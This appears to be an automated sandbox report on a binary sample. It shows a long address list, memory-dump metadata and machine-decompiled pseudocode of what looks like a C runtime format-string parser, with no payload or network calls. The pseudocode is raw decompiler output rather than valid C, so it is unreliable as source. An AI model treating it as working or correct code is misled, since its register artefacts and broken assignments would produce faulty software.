    0x00b95602
    0x00b95605
    0x00b9560b
    0x00b95611
    0x00b95619
    0x00b9561a
    0x00b9561d
    0x00b9561e
    0x00b95621
    0x00b95622
    0x00b95629
    0x00b9562a
    0x00b9562d
    0x00b9562e
    0x00b95631
    0x00b95632
    0x00b95638
    0x00b95639
    0x00b95647
    0x00b95649
    0x00b9564f
    0x00b9564f
    0x00b95655
    0x00b95657
    0x00b9565b
    0x00b9565d
    0x00b95665
    0x00b95666
    0x00b95669
    0x00b9566a
    0x00b95678
    0x00b9567a
    0x00b9567a
    0x00b9565b
    0x00b9567d
    0x00b95684
    0x00b95687
    0x00b9568c
    0x00b9568c
    0x00b95692
    0x00b95694
    0x00b9569c
    0x00b9569d
    0x00b956a0
    0x00b956a1
    0x00b956b0
    0x00b956b2
    0x00b956b2
    0x00b95692
    0x00b956b5
    0x00b956b8
    0x00b956bb
    0x00b956be
    0x00b956c3
    0x00b956c9
    0x00b956cc
    0x00b956cf
    0x00b956cf
    0x00b956d2
    0x00b956d2
    0x00b956d5
    0x00b956e1
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b959f2
    0x00b95583
    0x00b95583
    0x00b9558a
    0x00b9558d
    0x00000000
    0x00000000
    0x00b9558f
    0x00b9558f
    0x00000000
    0x00b9558f
    0x00b95574
    0x00b95574
    0x00000000
    0x00000000
    0x00b95201
    0x00b95204
    0x00b95204
    0x00b9520a
    0x00b95265
    0x00b9526d
    0x00b95274
    0x00b9527a
    0x00b95280
    0x00b9520c
    0x00b9520c
    0x00b95216
    0x00b9521a
    0x00b95222
    0x00b95229
    0x00b95236
    0x00b9523d
    0x00b95249
    0x00b9524f
    0x00b95256
    0x00b95258
    0x00b95258
    0x00b9525f
    0x00b95287
    0x00b9528d
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b956e9
    0x00b956ec
    0x00b956ef
    0x00b956f2
    0x00000000
    0x00000000
    0x00b95447
    0x00b95447
    0x00b95453
    0x00b95459
    0x00b9545e
    0x00b95460
    0x00b9550a
    0x00b9550d
    0x00b9550d
    0x00b95510
    0x00b95524
    0x00b9552a
    0x00b95530
    0x00b95512
    0x00b95512
    0x00b9551f
    0x00b9551f
    0x00b95532
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b95466
    0x00b95466
    0x00b95466
    0x00b95468
    0x00b95476
    0x00b9546a
    0x00b9546a
    0x00b9546a
    0x00b95480
    0x00b95486
    0x00b9548c
    0x00b95493
    0x00b95495
    0x00b9549a
    0x00b9549c
    0x00b954a1
    0x00b954a6
    0x00b954a8
    0x00b954ad
    0x00b954b0
    0x00b954b3
    0x00b954b5
    0x00b954b5
    0x00b954b3
    0x00b954b6
    0x00b954bd
    0x00b95505
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b954bf
    0x00b954bf
    0x00b954c4
    0x00b954e0
    0x00b954e8
    0x00b954f2
    0x00b954f5
    0x00b954fa
    0x00000000
    0x00b954fa
    0x00000000
    0x00b9574c
    0x00b9574c
    0x00b95756
    0x00b95756
    0x00b9575c
    0x00b9575e
    0x00b95761
    0x00b95761
    0x00b95767
    0x00b95767
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b95341
    0x00b95341
    0x00b95345
    0x00b95353
    0x00b95356
    0x00b95347
    0x00b95347
    0x00b95347
    0x00b9535c
    0x00b95362
    0x00b95368
    0x00b95374
    0x00b9537a
    0x00b9537a
    0x00b95380
    0x00b953e7
    0x00b953e7
    0x00b953eb
    0x00b953ed
    0x00b953f3
    0x00b953f3
    0x00b953f6
    0x00b953f9
    0x00b953ff
    0x00b953ff
    0x00b953ff
    0x00b9540b
    0x00b9540e
    0x00b95414
    0x00b95416
    0x00000000
    0x00000000
    0x00b95418
    0x00b95418
    0x00b9541e
    0x00b95421
    0x00b95423
    0x00000000
    0x00000000
    0x00b95425
    0x00b9542b
    0x00b9542e
    0x00b9542e
    0x00b95436
    0x00b95436
    0x00b9543c
    0x00b9543c
    0x00b9543f
    0x00000000
    0x00b95382
    0x00b95382
    0x00b95382
    0x00b95386
    0x00b95388
    0x00b9538d
    0x00b9538d
    0x00b95390
    0x00b95397
    0x00b9539a
    0x00b953a0
    0x00b953a0
    0x00b953a0
    0x00b953ac
    0x00b953af
    0x00b953b5
    0x00b953b7
    0x00000000
    0x00000000
    0x00b953b9
    0x00b953b9
    0x00b953bf
    0x00b953c2
    0x00b953c4
    0x00000000
    0x00000000
    0x00b953c6
    0x00b953cc
    0x00b953cf
    0x00b953cf
    0x00b953d7
    0x00b953dd
    0x00b953e0
    0x00b953e2
    0x00b95442
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00000000
    0x00b956fb
    0x00b956fb
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95846
    0x00000000
    0x00b95717
    0x00b95717
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95846
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00000000
    0x00b94fb1
    0x00b94fb4
    0x00b94fb7
    0x00000000
    0x00000000
    0x00b94fbc
    0x00b94fbf
    0x00b94fc4
    0x00000000
    0x00000000
    0x00b94fa6
    0x00b94fa6
    0x00b94fa9
    0x00b94fac
    0x00000000
    0x00000000
    0x00b94f9b
    0x00b94f9e
    0x00b94fa1
    0x00000000
    0x00000000
    0x00b94fc9
    0x00b94fc9
    0x00b94fcc
    0x00b94fcc
    0x00b94fcf
    0x00000000
    0x00000000
    0x00b94fd2
    0x00000000
    0x00000000
    0x00b94d6e
    0x00b94d70
    0x00b94d7e
    0x00b94d72
    0x00b94d72
    0x00b94d72
    0x00b94d88
    0x00b94d8e
    0x00b94d9b
    0x00b94d9d
    0x00b94da2
    0x00b94da4
    0x00b94da9
    0x00b94dae
    0x00b94db0
    0x00b94db5
    0x00b94dbb
    0x00b94dbd
    0x00b94dbd
    0x00b94dbb
    0x00b94dbe
    0x00b94dc5
    0x00000000
    0x00b94dc7
    0x00b94dcc
    0x00b94de8
    0x00b94df0
    0x00b94dfd
    0x00b94e02
    0x00b95cc1
    0x00b95cce
    0x00b95cce
    0x00b94dc5
    0x00b94d68
    0x00b95bfd
    0x00b95bfd
    0x00b95c04
    0x00b95c1b
    0x00b95c1b
    0x00b95c25
    0x00b95c25
    0x00b95c2b
    0x00b95c31
    0x00b95c38
    0x00b95c3a
    0x00b95c3f
    0x00b95c41
    0x00b95c46
    0x00b95c4b
    0x00b95c4d
    0x00b95c52
    0x00b95c55
    0x00b95c58
    0x00b95c5a
    0x00b95c5a
    0x00b95c58
    0x00b95c5b
    0x00b95c62
    0x00b95cad
    0x00b95cb6
    0x00b95cbb
    0x00b95c64
    0x00b95c69
    0x00b95c85
    0x00b95c8d
    0x00b95c9a
    0x00b95c9f
    0x00b95c9f
    0x00000000
    0x00b95c62
    0x00b95c06
    0x00b95c06
    0x00b95c0d
    0x00000000
    0x00000000
    0x00b95c0f
    0x00b95c0f
    0x00000000
    0x00b95c0f
    0x00b959f2
    0x00b959c9
    0x00b959c9
    0x00b959cd
    0x00b959da
    0x00b959dd
    0x00b959e0
    0x00b959e3
    0x00b959e6
    0x00b959e9
    0x00b959ec
    0x00b959ec
    0x00b959ef
    0x00000000
    0x00b959ef
    0x00b959cf
    0x00b959cf
    0x00b959d2
    0x00b959d5
    0x00b959d8
    0x00000000
    0x00000000
    0x00000000
    0x00b959d8
    0x00b95931
    0x00b95931
    0x00b95934
    0x00b95937
    0x00b9593e
    0x00b95945
    0x00b9594d
    0x00b95953
    0x00b95956
    0x00b95959
    0x00b95960
    0x00b9596c
    0x00b95972
    0x00b95978
    0x00b9597f
    0x00b95981
    0x00b95987
    0x00b95987
    0x00b9598d
    0x00b9598d
    0x00b95993
    0x00b95996
    0x00b9599c
    0x00b959a1
    0x00b959a4
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00000000
    0x00b95921
    0x00b95913
    0x00b95853
    0x00b95853
    0x00b9585a
    0x00000000
    0x00000000
    0x00000000
    0x00b95888
    0x00b95888
    0x00b9588e
    0x00b95894
    0x00b9589a
    0x00000000
    0x00b9589a
    0x00b9576a
    0x00b95721
    0x00b9570b

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __aulldiv__aullrem_get_int64_arg
    • String ID: 0$9
    • API String ID: 3120068967-1975997740
    • Opcode ID: f503401755c3559ac62cc389b969ad768a44c11740484738e901184bab88d6a9
    • Instruction ID: 59b5eaea876d60bd6c0f2c68735cdb81249a753aeb1921e6827ba3234d328f52
    • Opcode Fuzzy Hash: f503401755c3559ac62cc389b969ad768a44c11740484738e901184bab88d6a9
    • Instruction Fuzzy Hash: 9641CDB1D15A28DFEF26CF98C889BAEB7B5FB44300F2485E9D449A7240D7349A85CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00B96A89() {
    				signed int _t483;
    				void* _t488;
    				signed int _t490;
    				void* _t498;
    				void* _t501;
    				signed int _t519;
    				void* _t523;
    				void* _t524;
    				signed int _t525;
    				void* _t527;
    
    				L0:
    				while(1) {
    					L0:
    					 *((intOrPtr*)(_t525 - 0x460)) = 0x27;
    					while(1) {
    						L145:
    						 *(__ebp - 8) = 0x10;
    						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    						__eflags =  *(__ebp - 0x10) & 0x00000080;
    						if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    							__edx = 0x30;
    							 *(__ebp - 0x14) = __dx;
    							 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
    							__eflags =  *(__ebp - 0x460) + 0x51;
    							 *(__ebp - 0x12) = __ax;
    							 *(__ebp - 0x1c) = 2;
    						}
    						while(1) {
    							L150:
    							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    							__eflags =  *(__ebp - 0x10) & 0x00008000;
    							if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    								__eflags =  *(__ebp - 0x10) & 0x00001000;
    								if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    									__eflags =  *(__ebp - 0x10) & 0x00000020;
    									if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    										__eflags =  *(__ebp - 0x10) & 0x00000040;
    										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    											__ecx = __ebp + 0x14;
    											__eax = E00B93D50(__ebp + 0x14);
    											__edx = 0;
    											__eflags = 0;
    											 *(__ebp - 0x4a0) = __eax;
    											 *(__ebp - 0x49c) = 0;
    										} else {
    											__eax = __ebp + 0x14;
    											__eax = E00B93D50(__ebp + 0x14);
    											asm("cdq");
    											 *(__ebp - 0x4a0) = __eax;
    											 *(__ebp - 0x49c) = __edx;
    										}
    									} else {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    										__eflags =  *(__ebp - 0x10) & 0x00000040;
    										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    											__ecx = __ebp + 0x14;
    											E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    											asm("cdq");
    											 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    											 *(__ebp - 0x49c) = __edx;
    										} else {
    											__eax = __ebp + 0x14;
    											__eax = E00B93D50(__ebp + 0x14);
    											__ax = __eax;
    											asm("cdq");
    											 *(__ebp - 0x4a0) = __eax;
    											 *(__ebp - 0x49c) = __edx;
    										}
    									}
    								} else {
    									__eax = __ebp + 0x14;
    									 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    									 *(__ebp - 0x49c) = __edx;
    								}
    							} else {
    								__ecx = __ebp + 0x14;
    								 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    								 *(__ebp - 0x49c) = __edx;
    							}
    							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    							__eflags =  *(__ebp - 0x10) & 0x00000040;
    							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    								goto L167;
    							}
    							L163:
    							__eflags =  *(__ebp - 0x49c);
    							if(__eflags > 0) {
    								goto L167;
    							}
    							L164:
    							if(__eflags < 0) {
    								L166:
    								 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
    								__edx =  *(__ebp - 0x49c);
    								asm("adc edx, 0x0");
    								__edx =  ~( *(__ebp - 0x49c));
    								 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
    								 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    								L168:
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    								__eflags =  *(__ebp - 0x10) & 0x00008000;
    								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    									__eflags =  *(__ebp - 0x10) & 0x00001000;
    									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    										__edx =  *(__ebp - 0x4a8);
    										__eax =  *(__ebp - 0x4a4);
    										__eax =  *(__ebp - 0x4a4) & 0x00000000;
    										__eflags = __eax;
    										 *(__ebp - 0x4a4) = __eax;
    									}
    								}
    								__eflags =  *(__ebp - 0x30);
    								if( *(__ebp - 0x30) >= 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    									__eflags =  *(__ebp - 0x30) - 0x200;
    									if( *(__ebp - 0x30) > 0x200) {
    										 *(__ebp - 0x30) = 0x200;
    									}
    								} else {
    									 *(__ebp - 0x30) = 1;
    								}
    								 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    								__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    								if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    									 *(__ebp - 0x1c) = 0;
    								}
    								__eax = __ebp - 0x249;
    								 *(__ebp - 4) = __ebp - 0x249;
    								while(1) {
    									L178:
    									__ecx =  *(__ebp - 0x30);
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									__eflags =  *(__ebp - 0x30);
    									if( *(__ebp - 0x30) > 0) {
    										goto L180;
    									}
    									L179:
    									 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    									__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    									if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    										L183:
    										__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
    										 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
    										__ecx =  *(__ebp - 4);
    										__ecx =  *(__ebp - 4) + 1;
    										 *(__ebp - 4) = __ecx;
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    										__eflags =  *(__ebp - 0x10) & 0x00000200;
    										if(( *(__ebp - 0x10) & 0x00000200) == 0) {
    											while(1) {
    												L187:
    												__eflags =  *(__ebp - 0x28);
    												if( *(__ebp - 0x28) != 0) {
    													goto L212;
    												}
    												L188:
    												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    												__eflags =  *(__ebp - 0x10) & 0x00000040;
    												if(( *(__ebp - 0x10) & 0x00000040) != 0) {
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
    													__eflags =  *(__ebp - 0x10) & 0x00000100;
    													if(( *(__ebp - 0x10) & 0x00000100) == 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
    														__eflags =  *(__ebp - 0x10) & 0x00000001;
    														if(( *(__ebp - 0x10) & 0x00000001) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
    															__eflags =  *(__ebp - 0x10) & 0x00000002;
    															if(( *(__ebp - 0x10) & 0x00000002) != 0) {
    																__edx = 0x20;
    																 *(__ebp - 0x14) = __dx;
    																 *(__ebp - 0x1c) = 1;
    															}
    														} else {
    															__eax = 0x2b;
    															 *(__ebp - 0x14) = __ax;
    															 *(__ebp - 0x1c) = 1;
    														}
    													} else {
    														__ecx = 0x2d;
    														 *(__ebp - 0x14) = __cx;
    														 *(__ebp - 0x1c) = 1;
    													}
    												}
    												 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
    												__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    												 *(__ebp - 0x4ac) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
    												__eflags =  *(__ebp - 0x10) & 0x0000000c;
    												if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
    													__edx = __ebp - 0x44c;
    													__eax =  *(__ebp + 8);
    													__ecx =  *(__ebp - 0x4ac);
    													__eax = E00B971B0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
    												}
    												__edx = __ebp - 0x44c;
    												__eax =  *(__ebp + 8);
    												__ecx =  *(__ebp - 0x1c);
    												__edx = __ebp - 0x14;
    												E00B971F0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x44c) =  *(__ebp - 0x10);
    												__eax =  *(__ebp - 0x10) & 0x00000008;
    												__eflags =  *(__ebp - 0x10) & 0x00000008;
    												if(( *(__ebp - 0x10) & 0x00000008) != 0) {
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    													__eflags =  *(__ebp - 0x10) & 0x00000004;
    													if(( *(__ebp - 0x10) & 0x00000004) == 0) {
    														__edx = __ebp - 0x44c;
    														__eax =  *(__ebp + 8);
    														__ecx =  *(__ebp - 0x4ac);
    														__eax = E00B971B0(0x30,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
    													}
    												}
    												__eflags =  *(__ebp - 0xc);
    												if( *(__ebp - 0xc) != 0) {
    													L208:
    													__edx = __ebp - 0x44c;
    													__eax =  *(__ebp + 8);
    													__ecx =  *(__ebp - 0x24);
    													__edx =  *(__ebp - 4);
    													__eax = E00B971F0(__ecx,  *(__ebp - 4), __ecx,  *(__ebp + 8), __ebp - 0x44c);
    													goto L209;
    												} else {
    													L201:
    													__eflags =  *(__ebp - 0x24);
    													if( *(__ebp - 0x24) <= 0) {
    														goto L208;
    													}
    													L202:
    													__edx =  *(__ebp - 4);
    													 *(__ebp - 0x4b0) =  *(__ebp - 4);
    													__eax =  *(__ebp - 0x24);
    													 *(__ebp - 0x4b4) =  *(__ebp - 0x24);
    													while(1) {
    														L203:
    														__ecx =  *(__ebp - 0x4b4);
    														 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
    														 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
    														__eflags = __ecx;
    														if(__ecx <= 0) {
    															break;
    														}
    														L204:
    														__ecx = __ebp - 0x40;
    														__eax = E00B7C680(__ebp - 0x40);
    														__ecx = __ebp - 0x40;
    														E00B7C680(__ebp - 0x40) =  *__eax;
    														__ecx =  *(__ebp - 0x458 + 0xac);
    														__edx =  *(__ebp - 0x4b0);
    														__eax = __ebp - 0x458;
    														 *(__ebp - 0x4b8) = E00B90E50(__ebp - 0x458,  *(__ebp - 0x4b0),  *(__ebp - 0x458 + 0xac), __ebp - 0x458);
    														__eflags =  *(__ebp - 0x4b8);
    														if( *(__ebp - 0x4b8) > 0) {
    															L206:
    															__ecx = __ebp - 0x44c;
    															__edx =  *(__ebp + 8);
    															 *(__ebp - 0x458) & 0x0000ffff = E00B97150( *(__ebp - 0x458) & 0x0000ffff,  *(__ebp + 8), __ebp - 0x44c);
    															 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
    															 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
    															continue;
    														}
    														L205:
    														 *(__ebp - 0x44c) = 0xffffffff;
    														break;
    													}
    													L207:
    													L209:
    													__eflags =  *(__ebp - 0x44c);
    													if( *(__ebp - 0x44c) >= 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    														__eflags =  *(__ebp - 0x10) & 0x00000004;
    														if(( *(__ebp - 0x10) & 0x00000004) != 0) {
    															__ecx = __ebp - 0x44c;
    															__edx =  *(__ebp + 8);
    															 *(__ebp - 0x4ac) = E00B971B0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
    														}
    													}
    												}
    												L212:
    												__eflags =  *(__ebp - 0x20);
    												if( *(__ebp - 0x20) != 0) {
    													__ecx =  *(__ebp - 0x20);
    													__eax = L00B7EB20( *(__ebp - 0x20), 2);
    													 *(__ebp - 0x20) = 0;
    												}
    												while(1) {
    													L214:
    													 *(_t525 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t525 + 0xc))));
    													_t502 =  *(_t525 - 0x454) & 0x0000ffff;
    													 *((intOrPtr*)(_t525 + 0xc)) =  *((intOrPtr*)(_t525 + 0xc)) + 2;
    													if(( *(_t525 - 0x454) & 0x0000ffff) == 0 ||  *(_t525 - 0x44c) < 0) {
    														break;
    													} else {
    														if(( *(_t525 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t525 - 0x454) & 0x0000ffff) > 0x78) {
    															 *(_t525 - 0x4d8) = 0;
    														} else {
    															 *(_t525 - 0x4d8) =  *(( *(_t525 - 0x454) & 0x0000ffff) +  &M00B77B58) & 0xf;
    														}
    													}
    													L7:
    													 *(_t525 - 0x450) =  *(_t525 - 0x4d8);
    													_t519 =  *(_t525 - 0x450) * 9;
    													_t490 =  *(_t525 - 0x45c);
    													_t510 = ( *(_t519 + _t490 + 0xb77b78) & 0x000000ff) >> 4;
    													 *(_t525 - 0x45c) = ( *(_t519 + _t490 + 0xb77b78) & 0x000000ff) >> 4;
    													if( *(_t525 - 0x45c) != 8) {
    														L16:
    														 *(_t525 - 0x4e0) =  *(_t525 - 0x45c);
    														__eflags =  *(_t525 - 0x4e0) - 7;
    														if( *(_t525 - 0x4e0) > 7) {
    															continue;
    														}
    														L17:
    														switch( *((intOrPtr*)( *(_t525 - 0x4e0) * 4 +  &M00B97044))) {
    															case 0:
    																L18:
    																 *(_t525 - 0xc) = 1;
    																E00B97150( *(_t525 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t525 + 8)), _t525 - 0x44c);
    																_t527 = _t527 + 0xc;
    																goto L214;
    															case 1:
    																L19:
    																 *(__ebp - 0x2c) = 0;
    																__ecx =  *(__ebp - 0x2c);
    																 *(__ebp - 0x28) = __ecx;
    																__edx =  *(__ebp - 0x28);
    																 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																__eax =  *(__ebp - 0x18);
    																 *(__ebp - 0x1c) =  *(__ebp - 0x18);
    																 *(__ebp - 0x10) = 0;
    																 *(__ebp - 0x30) = 0xffffffff;
    																 *(__ebp - 0xc) = 0;
    																goto L214;
    															case 2:
    																L20:
    																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																 *(__ebp - 0x4e4) = __ecx;
    																 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																__eflags =  *(__ebp - 0x4e4) - 0x10;
    																if( *(__ebp - 0x4e4) > 0x10) {
    																	goto L27;
    																}
    																L21:
    																_t57 =  *(__ebp - 0x4e4) + 0xb9707c; // 0x498d04
    																__ecx =  *_t57 & 0x000000ff;
    																switch( *((intOrPtr*)(__ecx * 4 +  &M00B97064))) {
    																	case 0:
    																		goto L24;
    																	case 1:
    																		goto L25;
    																	case 2:
    																		goto L23;
    																	case 3:
    																		goto L22;
    																	case 4:
    																		goto L26;
    																	case 5:
    																		goto L27;
    																}
    															case 3:
    																L28:
    																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    																if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																	__edx =  *(__ebp - 0x18);
    																	__edx =  *(__ebp - 0x18) * 0xa;
    																	__eflags = __edx;
    																	_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																	__ecx = __edx + _t81;
    																	 *(__ebp - 0x18) = __ecx;
    																} else {
    																	__edx = __ebp + 0x14;
    																	 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																	__eflags =  *(__ebp - 0x18);
    																	if( *(__ebp - 0x18) < 0) {
    																		__eax =  *(__ebp - 0x10);
    																		__eax =  *(__ebp - 0x10) | 0x00000004;
    																		__eflags = __eax;
    																		 *(__ebp - 0x10) = __eax;
    																		__ecx =  *(__ebp - 0x18);
    																		__ecx =  ~( *(__ebp - 0x18));
    																		 *(__ebp - 0x18) = __ecx;
    																	}
    																}
    																L33:
    																goto L214;
    															case 4:
    																L34:
    																 *(__ebp - 0x30) = 0;
    																goto L214;
    															case 5:
    																L35:
